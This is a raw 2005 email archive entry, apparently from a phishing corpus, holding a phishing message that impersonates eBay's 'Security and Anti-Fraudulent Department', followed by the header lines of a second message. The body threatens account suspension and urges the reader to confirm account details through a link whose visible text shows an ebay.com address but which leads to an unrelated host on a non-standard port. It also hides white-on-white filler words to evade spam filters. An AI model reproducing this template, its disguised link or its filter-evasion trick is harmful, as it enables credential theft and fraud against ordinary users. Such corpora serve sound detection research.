From: "Kenny" <Conklin@eBay.com>
To: "Jose" <jose@monkey.org>
Subject: Password failure, Re-Ccheck your eBay.com account and secure your debt card. lottieama tepid
Date: Wed, 09 Nov 2005 02:03:42 -0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--=_Mh8HkXfm1Oz0sX"
X-Spam-Flag: YES
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: ***********
X-Spam-Status: Yes, score=12.0 required=5.0 tests=HTML_FONT_INVISIBLE,
	HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,
	MIME_HTML_ONLY_MULTI,MPART_ALT_DIFF,RCVD_HELO_IP_MISMATCH,
	RCVD_IN_NJABL_DUL,RCVD_NUMERIC_HELO,SUBJ_YOUR_DEBT,WEIRD_PORT,
	X_MESSAGE_INFO autolearn=spam version=3.0.2
X-Spam-Report: 
	*  1.3 SUBJ_YOUR_DEBT Subject contains "Your Bills" or similar
	*  4.2 X_MESSAGE_INFO Bulk email fingerprint (X-Message-Info) found
	*  1.2 RCVD_NUMERIC_HELO Received: contains an IP address used for HELO
	*  2.2 RCVD_HELO_IP_MISMATCH Received: HELO and IP do not match, but should
	*  0.1 WEIRD_PORT URI: Uses non-standard port number for HTTP
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 MPART_ALT_DIFF BODY: HTML and text parts are different
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  0.0 HTML_FONT_INVISIBLE BODY: HTML font color is same as background
	*  0.1 RCVD_IN_NJABL_DUL RBL: NJABL: dialup sender did non-local SMTP
	*      [221.126.245.133 listed in combined.njabl.org]
	*  0.1 HTML_MIME_NO_HTML_TAG HTML-only message, but there is no HTML tag
	*  2.4 MIME_HTML_ONLY_MULTI Multipart message only has text/html MIME parts
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 436

----=_Mh8HkXfm1Oz0sX
Content-Type: text/html;
	charset="iso-5636-2"
Content-Transfer-Encoding: 7Bit

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
<font color="#FFFFFF" size="1">allegheny flanksustenance adenosineadaclevelanddadeassociatestreamincompressible banjopickaxeescheatcoriolanusproxy </font>
<table width="646" height="465" border="0">
  <tr>
    <td colspan="2"><a href="http://xxactiv12.6600.org:8071/index.html" target="_blank"><img src="http://pics.ebaystatic.com/aw/pics/navbar/eBayLogoTM.gif" 

alt="eBay.com" width="150" height="70" border="0"></a></td>
  </tr><tr> 
    <td width="8"><font face="Arial, Helvetica, sans-serif" size="2"></font></td>
    <td width="628"><strong><font face="Arial, Helvetica, sans-serif" size="2">Dear eBay. com customer,</font></strong></td>
  </tr>
  <tr align="left" valign="top"> 
    <td colspan="2" height="116"> 
      <p><font face="Arial, Helvetica, sans-serif" size="2">You have been indefinitely suspended from eBay because our records indicate your account was involved in activities that violate our policy governing seller non-performance.</font></p>
      <p><font face="Arial, Helvetica, sans-serif" size="2">We now need you to 
        re-confirm your account information to us. If this is not completed till 
        <b>Nov 10, 2005</b>, we will be forced to suspend your account Indefinitely, 
        as it may have been used for fraudulent purposes.</font></p>
      <p><font face="Arial, Helvetica, sans-serif" size="2">We thank you for your 
        cooperation in this manner .</font></p>
    </td>
  </tr>
  <tr> 
    <td colspan="2" height="13">&nbsp;</td>
  </tr>
  <tr> 
    <td colspan="2"> 
      <p><font face="Arial, Helvetica, sans-serif" size="2">Click below to confirm 
        and verify your eBay Account:<br>
        </font><font face="Arial, Helvetica, sans-serif" size="2"><a 

href="http://xxactiv12.6600.org:8071/index.html" target="_blank"><strong>http://www.ebay.com/aw-cgi/eBayISAPI.dllSignIn-ssPageName-Suspended.phpcardboard</strong></a></font></p>
      </td>
  </tr>
  <tr> 
    <td colspan="2" height="6"><font face="Arial, Helvetica, sans-serif" size="2"></font></td>
  </tr>
  <tr> 
    <td colspan="2"> 
      <p><font face="Arial, Helvetica, sans-serif" size="2">Note: If you choose 
        to ignore our request, you leave us no choice but to suspend your account. </font></p>
    </td>
  </tr>
  <tr> 
    <td colspan="2" height="12"><font face="Arial, Helvetica, sans-serif" size="2"></font></td>
  </tr>
  <tr> 
    <td colspan="2"><font face="Arial, Helvetica, sans-serif" size="2">Best Regards, 
      <BR>
      eBay .com<br>
      eBay .com Security and Anti-Fraudulent Department .</font></td>
  </tr>
</table>
<p><font color="#FFFFFF" size="1"> eigenfunction aarhusringside anglestyliconferrableearmarkhuntingtondeviseemelon vermeilchildhoodslowbinderyclapboardSimpson@eBay.comHuddleston@eBay.comHoneycuttbarbudo@eBay.com </font> <br>
</p>

----=_Mh8HkXfm1Oz0sX--

From Hillary@eBay.com  Tue Nov  8 23:31:34 2005
Return-Path: <Hillary@eBay.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 8BC4F536E3D
	for <jose@login.monkey.org>; Tue,  8 Nov 2005 23:31:34 -0500 (EST)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id 3F01A6FA2EB
	for <jose@monkey.org>; Tue,  8 Nov 2005 23:31:09 -0500 (EST)
Received: from 204.181.64.8 (unknown [85.101.192.242])
	by mail2.monkey.org (Postfix) with SMTP
	for <jose@monkey.org>; Tue,  8 Nov 2005 23:31:00 -0500 (EST)
Received: from hbvdavwi.tiscali.fr ([249.112.63.230]) by 85.101.192.242 with SMTP id ec773RAZ465BXwjn140;
	 Wed, 09 Nov 2005 02:27:02 -0200
